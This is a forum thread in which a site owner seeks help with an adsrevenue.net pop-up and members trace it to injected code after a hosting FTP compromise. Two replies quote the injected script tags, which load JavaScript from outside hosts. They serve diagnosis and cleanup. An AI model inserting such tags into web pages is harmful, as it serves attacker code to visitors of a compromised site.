help on adsrevenue.net pop up

Business Listing
Nov 4, 2005
13,090
2,896
Any help please.

I am getting a pop up on my site for adsrevenue.net

Am running a full system scan at the moment - nothing showing so far

Assume I have a virus

Any ideas as to how to get rid of it please?
 

Subbynet

Free Member
Aug 1, 2005
6,000
1,101
45
Luton
Hi,

I'm also seeing a pop up, so that indicates to me that its likely someone has injected code into your site for the purpose of serving advertisements.

This line looks like the suspect.

<script type=text/javascript src=http://skaf.awardspace.info/49728baec2246.js></script>

(edit)

Forgot to add, it would be wise to audit your security to find out how they gained access to add this line of code.
 
Last edited:
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
thanks for that - have reported to my host provider 'names'!

Am still waiting for them to get back to me - so it is not my PC.

And this means that Names.co.uk have allowed this to happen?
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
well got a message last week after namesco ftp being hacked !!!!

Let me take the line out and see that happen but think the account ftp account has been hacked.

Best change all ftp passwords.

Thanks for your help - what a star
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
We can guess though! :)
I'm going to say it's either:

a) The person who coded the PHP on your site...
b) you have a weak password/username and somone has changed the page using FTP

not 1 as it is me

it is 2 and the fault is at namesco
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
try using a third party ftp software rather than namescos online ftp. Not sure it will make much difference in the future, but at least you won't be using a browser to ftp your website.

I do! use a separate program
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
Guys

Thanks for all your help. It si just funny that they send the mail out and then there is a problem.

Anyway I have checked the code to what is stored locally - can see this line in my code. Have reloaded and still getting the same problem.

Is it being called from else where? Any help - suggestions please?
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
hey thanks for that but I have now found the little f***er.

had a few includes to go through

can you guys check me out now and see if it is ok

One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:

thanks guys

fab quick response and loads of help as usual
 
Upvote 0

zookx

Free Member
Oct 28, 2008
97
13
Worcestershire
hey thanks for that but I have now found the little f***er.

had a few includes to go through

can you guys check me out now and see if it is ok

One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:

thanks guys

fab quick response and loads of help as usual

The code should look something like


<script type=text/javascript
src=###########.reselecperu.com/49728b244045c.js></script>


If its a template based site you have, i.e. wordpress it will most likely be in the header, footer or wp-header file.

I've had this today with several sites I have with that host so I think you can be assured its nothing related to your site or your code.

I contacted my host and they have said they we're aware some sites had been infected and expected to have the problem solved within 24 hours. Personally I would have liked an email letting me know about the problem as soon as they we're aware of it but there you go.
 
Upvote 0
Business Listing
Nov 4, 2005
13,090
2,896
  • Like
Reactions: stugster
Upvote 0

wood1e2

Free Member
May 2, 2007
2,317
174
Leicester
this is true, compared to other hosting companies I have always found them really helpful...admittedly they are bigger now than when I firrst used them.

BUt still to be able to phone a worcester number and get the receptionist is lovely... :)

So I am surprised they have done nothing about this particular problem
 
Upvote 0

Subbynet

Free Member
Aug 1, 2005
6,000
1,101
45
Luton
good point well made - if they cared they would have told customers about this before.

Unfortunately they don't care about your business, you are but one of probably thousands of sites which they host. Ultimately I believe it is not up to the Web host to protect your business, it is completely down toyou to ensure the critical parts of your business are secure.

Your web hosts will take all the steps necessary to protect their own business.

When dealing with shared hosting you have two accept that you are at greater risk than you would be under dedicated managed hosting. Any one of the sites hosted on the same box as you could be vulnerable and allow an attacker access to that server which ultimately contains your website.

While the host does have responsibility for the server, its effectively impossible for them to make sure every script (HTML/PHP etc) on that server hasn't been tampered with, in this example by adding JavaScript to launch a pop-up.

You can of course help protect yourself by running a file integrity checker on a daily or at least weekly basis. The file integrity checker will report to you any changes which have been made to the files, alerting you to malicious changes.

I'm having that one - should fit perfectly in to any meeting with senior management! :D

Haha :D Saying that "Senior Management" shouldn't ever take any decisions on IT Security. They never understand its worth or importance until it affects the bottom line, its partly on the same lines that you thought something I said was funny ("oh yeah this guys chatting bull**** type of thing"), when in fact I was serious about the matter.
 
Upvote 0

Latest Articles